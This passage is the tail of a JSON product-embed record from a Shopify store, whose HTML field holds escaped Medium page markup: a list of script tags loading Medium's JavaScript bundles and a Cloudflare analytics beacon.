ession\":{\"xsrf\":\"\"},\"cache\":{\"cacheStatus\":\"HIT\"}}\u003c\/script\u003e\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/manifest.42165799.js\"\u003e\u003c\/script\u003e\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/9865.1496d74a.js\"\u003e\u003c\/script\u003e\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/main.e8051c79.js\"\u003e\u003c\/script\u003e\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/instrumentation.d9108df7.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/reporting.ff22a7a5.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/5049.d1ead72d.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/4810.6318add7.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/6618.db187378.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/1386.014e2ad3.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/9977.343f5002.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/5250.fc15c18c.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/8261.80c0631e.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/7975.b019beb1.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/2648.a582e725.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/2712.0f6c85f5.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/2793.01d2b056.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/1530.2779d8ee.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/3735.ca2f95e3.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/5642.0ebb50fd.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/6546.7e5d2ee6.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/6834.f2d3924e.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/2420.0330d157.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/2106.21ff89d3.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/6696.92b2dfc3.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/5832.a567559e.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/3366.1571a1d5.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/6040.6ceb7f43.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/4391.fd55a702.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/PostPage.MainContent.8ac17677.chunk.js\"\u003e\u003c\/script\u003e\u003cscript\u003ewindow.main();\u003c\/script\u003e\u003cscript defer src=\"https:\/\/static.cloudflareinsights.com\/beacon.min.js\/vcd15cbe7772f49c399c6a5babf22c1241717689176015\" integrity=\"sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==\" data-cf-beacon='{\"rayId\":\"8be7ddbf8f34ce51\",\"serverTiming\":{\"name\":{\"cfL4\":true}},\"version\":\"2024.8.0\",\"token\":\"0b5f665943484354a59c39c6833f7078\"}' crossorigin=\"anonymous\"\u003e\u003c\/script\u003e\n","brand":"money","offers":[{"title":"Default Title","offer_id":44178419351717,"sku":"","price":0.0,"currency_code":"IDR","in_stock":false}],"url":"https:\/\/mesoancassie.myshopify.com\/products\/medium","provider":"money","version":"1.0","type":"link"}